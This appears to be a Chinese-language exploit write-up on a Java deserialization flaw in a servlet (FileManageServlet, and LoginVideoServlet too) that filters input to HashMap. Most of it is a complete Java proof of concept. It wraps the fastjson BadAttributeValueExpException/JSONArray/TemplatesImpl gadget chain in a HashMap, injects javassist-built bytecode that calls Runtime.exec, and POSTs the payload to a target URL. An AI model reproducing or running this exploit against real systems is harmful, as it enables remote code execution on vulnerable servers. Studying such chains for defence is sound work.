public void doAction(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try (ObjectInputStream in = null;){
in = new FilteredObjectInputStream((InputStream)request.getInputStream(), new Class[]{HashMap.class});
HashMap headInfo = (HashMap)in.readObject();
String dsName = (String)headInfo.get("dsName");
...限制只能反序列化HashMap
套个HashMap然后打fastjson经典链子
BadAttributeValueExpException#readObjct -> JSONArray#toString -> JSONArray#toJSONString -> getterpackage org.example;
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.HashMap;
/**
* @ClassName unser1
* @Description
* @Author Xutao
* @Date 2025年09月29日 17:43
* @Version 1.0
*/
public class unser1 {
public static void main(String[] args) throws Exception {
String url = "http://10.0.2.8/servlet/FileManageServlet";
String command = "calc";
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.makeClass("pool");
CtClass superClass = pool.get(AbstractTranslet.class.getName());
clazz.setSuperclass(superClass);
CtConstructor constructor = new CtConstructor(new CtClass[0], clazz);
constructor.setBody("Runtime.getRuntime().exec(\"" + command + "\");");
clazz.addConstructor(constructor);
byte[][] bytes = {clazz.toBytecode()};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setValue(templates, "_bytecodes", bytes);
setValue(templates, "_name", "null");
setValue(templates, "_tfactory", null);
JSONArray jsonArray = new JSONArray();
jsonArray.add(templates);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
setFieldValue(badAttributeValueExpException, "val", jsonArray);
HashMap<Object, Object> hashmap = new HashMap<Object, Object>();
hashmap.put("xx",badAttributeValueExpException);
byte[] payload = serialize(hashmap);
HttpURLConnection conn = (HttpURLConnection) (new URL(url)).openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
conn.setRequestProperty("Content-Type", "application/octet-stream");
conn.setRequestProperty("Content-Length", String.valueOf(payload.length));
OutputStream os = conn.getOutputStream();
os.write(payload);
os.flush();
os.close();
if (conn.getResponseCode() == 200) {
System.out.println("命令执行成功");
} else {
System.out.println("命令执行失败");
}
}
public static void setValue(Object obj, String name, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
public static byte[] serialize(Object obj) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ObjectOutputStream objOut = new ObjectOutputStream(out);
objOut.writeObject(obj);
return out.toByteArray();
}
public static void setFieldValue(Object obj, String field, Object arg) throws Exception {
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(true);
f.set(obj, arg);
}
}
然后发现LoginVideoServlet接口也存在同样的漏洞
HashMap headInfo = (HashMap)in.readObject();照样打即可。